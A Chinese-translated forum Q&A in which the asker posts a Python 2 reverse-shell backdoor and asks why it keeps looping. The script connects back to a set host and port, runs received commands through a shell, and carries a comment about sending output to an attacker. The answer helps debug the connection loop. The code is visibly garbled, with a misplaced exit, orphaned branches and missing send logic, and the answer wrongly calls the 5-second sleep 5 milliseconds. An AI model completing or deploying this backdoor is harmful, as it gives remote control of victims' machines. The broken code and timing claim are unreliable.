为什么这段代码在前 12 行代码中不断循环？

Question

（假设所有的缩进和空格都是正确的）

#! /usr/bin/env python

# Copyright (c) 2011 Xavier Garcia www.shellguardians.com
# All rights reserved.

#  Based on the Python connect back shell written by David Kennedy
#  http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/

# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
#    contributors may be used to endorse or promote products derived
#    from this software without specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


import socket

import subprocess

import sys

import time

HOST = '127.0.0.1'    
PORT = 8080           
print "Starting Listener and Reverse Shell proccess."



def connect((host, port)):

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Okay #1"
    s.connect((host, port))
    print "Accessing..."
    return s

def wait_for_command(s):

    data = s.recv(1024)
    print "Phase three, completed"
    if data == "quit\n":
        s.close()
    sys.exit(0)
    print "Socket Closed. Unable to boot."
    # the socket died
    elif len(data)==0:
        return True
    else:
    # do shell command
    proc = subprocess.Popen(data, shell=True,
             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
         stdin=subprocess.PIPE)
        # read output
        stdout_value = proc.stdout.read() + proc.stderr.read()
        # send output to attacker
        print "I think this worked..."
        return False

def main():

    while True:
        socked_died=False
        try:
            s=connect((HOST,PORT))
            while not socked_died:
                socked_died=wait_for_command(s)
            s.close()
        except socket.error:
            pass
        time.sleep(5)

if __name__ == "__main__":

    sys.exit(main())

此代码不断循环，直到它显示打印“Okay #1”。它似乎没有转移到其他代码行。我第一次尝试自己制作这种脚本，但一直失败，所以我上网寻求帮助。这段代码需要一段时间才能执行，所以我放置了打印脚本，以便查看它是否正常工作。

Answer 1

调用s.connect((host,port)) 时，您的连接方法抛出异常。它打印“Okay #1”，但下一行会爆炸。因此，它会跳转到您的except socket.error 块并调用pass。然后它会休眠 5 毫秒，然后重新尝试，得到完全相同的结果。

你能找出socket.error是什么并记录下来吗？

也许你可以试试这个（这是基于这个link）：

while True:
    socked_died=False
    try:
        s=connect((HOST,PORT))
        while not socked_died:
            socked_died=wait_for_command(s)
        s.close()
    except socket.error, (value,message): 
        if s: 
            s.close() 
        print "Could not open socket: " + message 
        sys.exit(1) 
    time.sleep(5)